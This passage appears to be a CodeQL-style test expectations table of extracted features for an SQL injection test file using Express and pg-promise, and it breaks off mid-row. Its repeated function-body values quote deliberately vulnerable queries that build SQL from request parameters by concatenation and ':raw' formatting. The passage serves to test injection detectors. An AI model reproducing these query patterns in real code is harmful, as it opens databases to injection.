fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:76 | new Foo ... q, res) | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:76 | new Foo ... q, res) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:76 | new Foo ... q, res) | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:76 | new Foo ... q, res) | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:48:13:76 | new Foo ... q, res) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:52:13:54 | Foo | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:52:13:54 | Foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:52:13:54 | Foo | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:52:13:54 | Foo | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:52:13:54 | Foo | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:58:13:66 | onRequest | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:58:13:66 | onRequest | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:58:13:66 | onRequest | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:58:13:66 | onRequest | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:58:13:66 | onRequest | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:68:13:70 | req | CalleeFlexibleAccessPath | Foo().onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:68:13:70 | req | InputArgumentIndex | 0 | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:68:13:70 | req | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:68:13:70 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:68:13:70 | req | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:68:13:70 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:68:13:70 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:73:13:75 | res | CalleeFlexibleAccessPath | Foo().onRequest | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:73:13:75 | res | InputArgumentIndex | 1 | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:73:13:75 | res | contextFunctionInterfaces | constructor()\nonRequest(req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:73:13:75 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:73:13:75 | res | enclosingFunctionBody | req res Foo onRequest req res | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:73:13:75 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise-types.ts:13:73:13:75 | res | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:1:1:0 | this | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:1:1:0 | this | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:1:1:1 | pgp | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:1:1:1 | pgp | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:1:1:1 | pgp | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:1:1:1 | require | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:1:1:1 | require | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:7:1:9 | pgp | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:7:1:9 | pgp | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:7:1:9 | pgp | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:7:1:9 | pgp | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:7:1:35 | pgp | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:7:1:35 | pgp | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:7:1:35 | pgp | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:7:1:35 | pgp = r ... ise')() | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:7:1:35 | pgp = r ... ise')() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:7:1:35 | pgp = r ... ise')() | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:19 | require | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:19 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:19 | require | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:33 | exceptional return of require ... omise') | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:33 | exceptional return of require ... omise') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:33 | exceptional return of require ... omise') | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:33 | require ... omise') | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:33 | require ... omise') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:33 | require ... omise') | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:35 | exceptional return of require ... ise')() | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:35 | exceptional return of require ... ise')() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:35 | exceptional return of require ... ise')() | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:35 | require ... ise')() | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:35 | require ... ise')() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:13:1:35 | require ... ise')() | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:21:1:32 | 'pg-promise' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:21:1:32 | 'pg-promise' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:21:1:32 | 'pg-promise' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:21:1:32 | 'pg-promise' | contextFunctionInterfaces | cnd(t) | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:21:1:32 | 'pg-promise' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:1:21:1:32 | 'pg-promise' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:7 | require | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:7 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:7 | require | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:18 | exceptional return of require('express') | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:18 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:18 | exceptional return of require('express') | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:18 | require('express') | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:18 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:18 | require('express') | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:20 | exceptional return of require('express')() | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:20 | exceptional return of require('express')() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:20 | exceptional return of require('express')() | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:20 | require('express')() | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:20 | require('express')() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:20 | require('express')() | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:24 | require ... )().get | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:24 | require ... )().get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:3:24 | require ... )().get | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:66:2 | exceptional return of require ... );\\n}) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:66:2 | exceptional return of require ... );\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:66:2 | exceptional return of require ... );\\n}) | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:66:2 | require ... );\\n}) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:66:2 | require ... );\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:1:66:2 | require ... );\\n}) | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:9:3:17 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:9:3:17 | 'express' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:9:3:17 | 'express' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:9:3:17 | 'express' | contextFunctionInterfaces | cnd(t) | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:9:3:17 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:9:3:17 | 'express' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:22:3:24 | get | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:22:3:24 | get | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:22:3:24 | get | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:26:3:31 | '/foo' | CalleeFlexibleAccessPath | import(!)().get | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:26:3:31 | '/foo' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:26:3:31 | '/foo' | calleeImports | express | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:26:3:31 | '/foo' | contextFunctionInterfaces | cnd(t) | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:26:3:31 | '/foo' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:26:3:31 | '/foo' | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:3:33 | pgp | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:3:33 | pgp | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:3:33 | pgp | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:3:33 | pgp | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:3:33 | pgp | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:3:34 | query | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:3:34 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:3:34 | query | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:3:34 | query | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:3:34 | query | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | 'arguments' object of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | 'arguments' object of anonymous function | fileImports | express pg-promise | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | (req, r ... \\n );\\n} | CalleeFlexibleAccessPath | import(!)().get | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | (req, r ... \\n );\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | (req, r ... \\n );\\n} | calleeImports | express | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | (req, r ... \\n );\\n} | contextFunctionInterfaces | cnd(t) | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | (req, r ... \\n );\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | (req, r ... \\n );\\n} | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | exceptional return of anonymous function | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | exceptional return of anonymous function | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | exceptional return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | exceptional return of anonymous function | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | return of anonymous function | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | return of anonymous function | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | return of anonymous function | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:34:66:1 | return of anonymous function | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:35:3:37 | req | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:35:3:37 | req | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:35:3:37 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:35:3:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:35:3:37 | req | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:35:3:37 | req | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:35:3:37 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:35:3:37 | req | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:35:3:37 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:35:3:37 | req | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:40:3:42 | res | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:40:3:42 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:40:3:42 | res | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:40:3:42 | res | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:3:40:3:42 | res | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:10 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:10 | db | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:10 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:10 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:10 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:53 | db | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:53 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:53 | db | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND name = ${name} values id req params id name req params name db one text SELECT * FROM news where id = ${id}:value AND name LIKE '%${name}:value%' AND title LIKE "%${title}:value%" values id req params id name req params name title req params title db task t t one query db taskIf cnd t t one query t t one query | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:53 | db | enclosingFunctionName | get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:53 | db | fileImports | express pg-promise | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:53 | db = pg ... RING']) | contextFunctionInterfaces | cnd(t) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:53 | db = pg ... RING']) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:4:9:4:53 | db = pg ... RING']) | enclosingFunctionBody | req res db pgp process DB_CONNECTION_STRING env DB_CONNECTION_STRING query SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=' req params category ' ORDER BY PRICE db any query db many query db manyOrNone query db map query db multi query db multiResult query db none query db one query db oneOrNone query db query query db result query db one text query db one text SELECT * FROM news where id = $1 values req params id db one text SELECT * FROM news where id = $1:raw values req params id db one text SELECT * FROM news where id = $1^ values req params id db one text SELECT * FROM news where id = $1:raw AND name = $2:raw AND foo = $3 values req params id req params name req params foo db one text SELECT * FROM news where id = ${id}:raw AND 